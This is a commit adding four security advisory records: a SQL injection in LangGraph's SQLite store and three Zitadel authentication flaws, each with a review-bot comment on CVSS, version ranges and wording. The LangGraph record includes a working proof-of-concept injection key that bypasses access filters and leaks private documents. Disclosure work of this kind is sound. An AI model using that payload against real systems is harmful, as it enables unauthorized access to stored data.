
Commit abfbb63

Browse files
1 parent c2eb837 commit abfbb63


4 files changed

+306
-0
lines changed

Lines changed: 68 additions & 0 deletions
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-7p73-8jqx-23r8",
4+
"modified": "2025-10-29T22:21:43Z",
5+
"published": "2025-10-29T22:21:43Z",
6+
"aliases": [
7+
"CVE-2025-64104"
8+
],
9+
"summary": "LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore",
10+
"details": "### Summary\nLangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.\n\n### Details\n[`/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py`](https://github.com/langchain-ai/langgraph/blob/ee5d052a07aadd76dae123a27009ea0a3694fa0a/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py#L407)\n\nThe key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.\n\n```python\n filter_conditions.append(\n \"json_extract(value, '$.\"\n + key # <-- Directly concatenated, no escaping!\n + \"') = '\"\n + value.replace(\"'\", \"''\") # <-- Only value is escaped\n + \"'\"\n )\n```\n\n### Who is affected\n\nThis issue affects **only developers or projects that directly use the `checkpoint-sqlite` store**. \n\nAn application is vulnerable only if it:\n1. Instantiates the `SqliteStore` from the `checkpoint-sqlite` package, **and**\n2. 
Builds the `filter` argument using keys derived from **untrusted or user-supplied input** (such as query parameters, request bodies, or other external data).\n\nIf filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.\n\nNote: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n```python\n#!/usr/bin/env python3\n\"\"\"Minimal SQLite Key Injection POC for LangGraph\"\"\"\n\nfrom langgraph.store.sqlite import SqliteStore\n\n# Create store with test data\nwith SqliteStore.from_conn_string(\":memory:\") as store:\n store.setup()\n \n # Add public and private documents\n store.put((\"docs\",), \"public\", {\"access\": \"public\", \"data\": \"public info\"})\n store.put((\"docs\",), \"private\", {\"access\": \"private\", \"data\": \"secret\", \"password\": \"123\"})\n \n # Normal query - returns 1 public document\n normal = store.search((\"docs\",), filter={\"access\": \"public\"})\n print(f\"Normal query: {len(normal)} docs\")\n \n # SQL injection via malicious key\n malicious_key = \"access') = 'public' OR '1'='1' OR json_extract(value, '$.\"\n injected = store.search((\"docs\",), filter={malicious_key: \"dummy\"})\n \n print(f\"Injected query: {len(injected)} docs\")\n for doc in injected:\n if doc.value.get(\"access\") == \"private\":\n print(f\"LEAKED: {doc.value}\")\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "langgraph-checkpoint-sqlite"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.0.11"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.0.10"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
45+
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64104"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/langchain-ai/langgraph"
57+
}
58+
],
59+
"database_specific": {
60+
"cwe_ids": [
61+
"CWE-89"
62+
],
63+
"severity": "HIGH",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2025-10-29T22:21:43Z",
66+
"nvd_published_at": "2025-10-29T19:15:39Z"
67+
}
68+
}
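Review bot: the CVSS v3.1 vector in this record uses `AV:L` (local attack vector), which contradicts the advisory's own "Who is affected" text saying an application is vulnerable when filter keys come from "query parameters, request bodies, or other external data"; a sink reachable through a request body is network-reachable, so either the vector or the scoping wording should be corrected before `"severity": "HIGH"` is published on the basis of it. Two smaller points in `details`: the `summary` field reads like the PoC title ("... SQL Injection POC for SqliteStore") rather than a description of the flaw, and the text claims "a few different occurrences within the file" while citing only `base.py#L407`; listing the other concatenation sites, or pointing readers at the fix commit `bc9d45b` for the full set, would let downstream users confirm every sink was parameterized and not only the one quoted. The PoC is consistent with the quoted code: the key `access') = 'public' OR '1'='1' OR json_extract(value, '$.` closes the JSON path, injects an always-true predicate, and reopens the path so the trailing `') = 'dummy'` stays syntactically valid, which is why the private document comes back.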
Lines changed: 107 additions & 0 deletions
@@ -0,0 +1,107 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cfjq-28r2-4jv5",
4+
"modified": "2025-10-29T22:21:27Z",
5+
"published": "2025-10-29T22:21:27Z",
6+
"aliases": [
7+
"CVE-2025-64103"
8+
],
9+
"summary": "Zitadel May Bypass Second Authentication Factor",
10+
"details": "### Summary\n\nA vulnerability in Zitadel's token verification prematurely marked sessions as authenticated when only one factor was verified. \n\n### Impact\n\nZitadel provides an API for managing sessions, enabling custom login experiences in a dedicated UI or direct integration into applications. Session Tokens are issued for active sessions, which can be used as Bearer tokens to call the Zitadel API.\n\nStarting from 2.55.0 (see other affected versions below), Zitadel only required multi factor authentication in case the login policy has either enabled `requireMFA` or `requireMFAForLocalUsers`. If a user has set up MFA without this requirement, Zitadel would consider single factor auhtenticated sessions as valid as well and not require multiple factors.\n\nBypassing second authentication factors weakens multifactor authentication and enables attackers to bypass the more secure factor. An attacker can target the TOTP code alone, only six digits, bypassing password verification entirely and potentially compromising accounts with 2FA enabled.\n\n### Affected Versions\n\nSystems using the session API (v2 beta and v2) directly or via the new login UI in the following versions are affected:\n- **4.x**: `4.0.0` to `4.5.0` (including RC versions)\n- **3.x**: `3.0.0` to `3.4.2` (including RC versions)\n- **2.x**: `v2.53.6` to `v2.53.9`, `v2.54.3` to `v2.54.10`, `2.55.0` to `2.71.17`\n\n### Patches\n\nThe vulnerability has been addressed in the latest releases. 
The patch resolves the issue by requiring a configured second factor regardless of the login policies `requireMFA` or `requireMFAForLocalUsers` configuration.\n\n4.x: Upgrade to >=[4.6.0](https://github.com/zitadel/zitadel/releases/tag/v4.6.0)\n3.x: Update to >=[3.4.3](https://github.com/zitadel/zitadel/releases/tag/v3.4.3)\n2.x: Update to >=[2.71.18](https://github.com/zitadel/zitadel/releases/tag/v2.71.18)\n\n### Workarounds\n\nThe recommended solution is to update Zitadel to a patched version.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [[email protected]](mailto:[email protected])\n\n### Credits\n\nThis vulnerability was found by [zentrust partners GmbH](https://zentrust.partners) during a scheduled penetration test. Thank you to the analysts Martin Tschirsich, Joud Zakharia, Christopher Baumann.\nThe full report will be made public after the complete review.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/zitadel/zitadel/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "2.53.6"
29+
},
30+
{
31+
"last_affected": "2.53.9"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Go",
40+
"name": "github.com/zitadel/zitadel/v2"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "2.54.3"
48+
},
49+
{
50+
"last_affected": "2.54.10"
51+
}
52+
]
53+
}
54+
]
55+
},
56+
{
57+
"package": {
58+
"ecosystem": "Go",
59+
"name": "github.com/zitadel/zitadel/v2"
60+
},
61+
"ranges": [
62+
{
63+
"type": "ECOSYSTEM",
64+
"events": [
65+
{
66+
"introduced": "2.55.0"
67+
},
68+
{
69+
"fixed": "2.71.18"
70+
}
71+
]
72+
}
73+
],
74+
"database_specific": {
75+
"last_known_affected_version_range": "<= 2.71.17"
76+
}
77+
}
78+
],
79+
"references": [
80+
{
81+
"type": "WEB",
82+
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-cfjq-28r2-4jv5"
83+
},
84+
{
85+
"type": "ADVISORY",
86+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64103"
87+
},
88+
{
89+
"type": "WEB",
90+
"url": "https://github.com/zitadel/zitadel/commit/b284f8474eed0cba531905101619e7ae7963156b"
91+
},
92+
{
93+
"type": "PACKAGE",
94+
"url": "https://github.com/zitadel/zitadel"
95+
}
96+
],
97+
"database_specific": {
98+
"cwe_ids": [
99+
"CWE-287",
100+
"CWE-308"
101+
],
102+
"severity": "HIGH",
103+
"github_reviewed": true,
104+
"github_reviewed_at": "2025-10-29T22:21:27Z",
105+
"nvd_published_at": "2025-10-29T19:15:39Z"
106+
}
107+
}
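Review bot: the `affected` array encodes only the three 2.x ranges for `github.com/zitadel/zitadel/v2`, while `details` lists `4.0.0` to `4.5.0` and `3.0.0` to `3.4.2` as affected with fixes in `4.6.0` and `3.4.3`; OSV consumers and scanners match on `affected`, not on prose, so 3.x and 4.x deployments will get no hit from this record as written. Add `affected` entries for those ranges under whatever module path the 3.x and 4.x releases are published as, with `fixed` events at `3.4.3` and `4.6.0`. Two wording fixes in `details`: "auhtenticated" should be "authenticated", and "regardless of the login policies `requireMFA` or `requireMFAForLocalUsers` configuration" should be "regardless of the login policy's `requireMFA` or `requireMFAForLocalUsers` setting".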
Lines changed: 66 additions & 0 deletions
@@ -0,0 +1,66 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-mwmh-7px9-4c23",
4+
"modified": "2025-10-29T22:20:50Z",
5+
"published": "2025-10-29T22:20:50Z",
6+
"aliases": [
7+
"CVE-2025-64101"
8+
],
9+
"summary": "ZITADEL Vulnerable to Account Takeover via Malicious Forwarded Header Injection",
10+
"details": "### Impact\n\nA potential vulnerability exists in ZITADEL's password reset mechanism. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user.\n\nIf an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user's password and gain unauthorized access to their account.\n\nIt's important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled.\n\n### Affected Versions\n\nSystems running one of the following versions:\n- **4.x**: `4.0.0` to `4.5.0` (including RC versions)\n- **3.x**: `3.0.0` to `3.4.2` (including RC versions)\n- **2.x**: `v2.0.0` to `2.71.17`\n\n### Patches\n\nPatched version ensure proper validation of the headers:\n\n4.x: Upgrade to >=[4.6.0](https://github.com/zitadel/zitadel/releases/tag/v4.6.0)\n3.x: Update to >=[3.4.3](https://github.com/zitadel/zitadel/releases/tag/v3.4.3)\n2.x: Update to >=[2.71.18](https://github.com/zitadel/zitadel/releases/tag/v2.71.18)\n\n### Workarounds\n\nThe recommended solution is to update ZITADEL to a patched version.\n\nA ZITADEL fronting proxy can be configured to delete all Forwarded and X-Forwarded-Host header values before sending requests to ZITADEL self-hosted environments.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [[email protected]](mailto:[email protected])\n\n### Credits\n\nThanks to Amit Laish – GE Vernova for finding and reporting the vulnerability.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/zitadel/zitadel/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.71.18"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-mwmh-7px9-4c23"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64101"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/zitadel/zitadel/commit/72a5c33e6ac302b978d564bd049f9364f5a989b1"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/zitadel/zitadel"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-601",
59+
"CWE-640"
60+
],
61+
"severity": "HIGH",
62+
"github_reviewed": true,
63+
"github_reviewed_at": "2025-10-29T22:20:50Z",
64+
"nvd_published_at": "2025-10-29T19:15:38Z"
65+
}
66+
}
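Review bot: same coverage gap as the companion Zitadel record: `affected` has a single entry (`introduced: 0`, `fixed: 2.71.18`) on the `/v2` module path, while `details` states `3.0.0` to `3.4.2` and `4.0.0` to `4.5.0` are also affected with fixes in `3.4.3` and `4.6.0`; those ranges need their own `affected` entries or automated matching will report 3.x and 4.x as clean. Grammar in `details`: "Patched version ensure proper validation of the headers" should be "Patched versions ensure proper validation of the headers". On `cwe_ids`, CWE-640 (weak password recovery mechanism) fits the described flaw; CWE-601 ("URL Redirection to Untrusted Site") is a loose fit, since the attacker never triggers a redirect but instead poisons the host used to build the reset link via the `Forwarded` / `X-Forwarded-Host` request headers, so a CWE for improper handling of attacker-controlled headers would describe the root cause more accurately.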
Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-xrw9-r35x-x878",
4+
"modified": "2025-10-29T22:21:05Z",
5+
"published": "2025-10-29T22:21:05Z",
6+
"aliases": [
7+
"CVE-2025-64102"
8+
],
9+
"summary": "Zitadel allows brute-forcing authentication factors",
10+
"details": "### Summary\n\nA vulnerability in Zitadel allowed brute-force attack on OTP, TOTP and password allowing to impersonate the attacked user.\n\n### Impact\n\nAn attacker can perform an online brute-force attack on OTP, TOTP, and passwords. While Zitadel allows preventing online brute force attacks in scenarios like TOTP, Email OTP, or passwords using a lockout mechanism. The mechanism is not enabled by default and can cause a denial of service for the corresponding user if enabled. Additionally, the mitigation strategies were not fully implemented in the more recent resource-based APIs.\n\n### Affected Versions\n\nAll versions within the following ranges, including release candidates (RCs), are affected:\n- **4.x**: `4.0.0` to `4.4.0` (including RC versions)\n- **3.x**: `3.0.0` to `3.4.2` (including RC versions)\n- **2.x**: `v2.0.0` to `2.71.17`\n\n### Patches\n\nThe vulnerability has been addressed in the latest releases. The patch resolves the issue by enforcing the lockout policy on all OTP, TOTP and password checks. Additionally a “tar pit” has been introduced to slow down brute-force attacks by default. 
Zitadel responses will be delayed by t seconds, where t increases over the number of failed attempts within a given timeframe.\n\n4.x: Upgrade to >=[4.6.0](https://github.com/zitadel/zitadel/releases/tag/v4.6.0)\n3.x: Update to >=[3.4.3](https://github.com/zitadel/zitadel/releases/tag/v3.4.3)\n2.x: Update to >=[2.71.18](https://github.com/zitadel/zitadel/releases/tag/v2.71.18)\n\n### Workarounds\n\nThe recommended solution is to update Zitadel to a patched version.\n\nThe problem might be mitigated by enabling the optional logout policy (\"Password maximum attempts\") or by implementing more strict rate limits.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [[email protected]](mailto:[email protected])\n\n### Credits\n\nThis vulnerability was found by [zentrust partners GmbH](https://zentrust.partners) during a scheduled penetration test. Thank you to the analysts Martin Tschirsich, Joud Zakharia, Christopher Baumann.\nThe full report will be made public after the complete review.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/zitadel/zitadel/v2"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.71.18"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-xrw9-r35x-x878"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64102"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/zitadel/zitadel/commit/b8db8cdf9cc8ea13f461758aef12457f8b7d972a"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/zitadel/zitadel"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-307"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2025-10-29T22:21:05Z",
63+
"nvd_published_at": "2025-10-29T19:15:38Z"
64+
}
65+
}
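Review bot: `details` has a wrong word that inverts the meaning of the workaround: "enabling the optional logout policy (\"Password maximum attempts\")" should read "lockout policy", matching the "lockout mechanism" named in the Impact section and the "lockout policy" the patch enforces. Also check the 4.x range: Affected Versions says `4.0.0` to `4.4.0`, but the Patches section sends 4.x users to `>=4.6.0`, which leaves `4.5.0` neither listed as affected nor as fixed; the sibling advisories in this commit (GHSA-cfjq-28r2-4jv5, GHSA-mwmh-7px9-4c23) list `4.0.0` to `4.5.0`, so this looks like a typo, but it should be confirmed with the maintainers before publication. As with the other two records, `affected` covers only the `/v2` module (`introduced: 0`, `fixed: 2.71.18`) and the 3.x and 4.x ranges from the text are absent. Minor grammar: "While Zitadel allows preventing online brute force attacks in scenarios like TOTP, Email OTP, or passwords using a lockout mechanism. The mechanism is not enabled by default" is a sentence fragment; join it as "While Zitadel can prevent online brute-force attacks on TOTP, Email OTP and passwords with a lockout mechanism, that mechanism is not enabled by default and, when enabled, can cause a denial of service for the targeted user."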
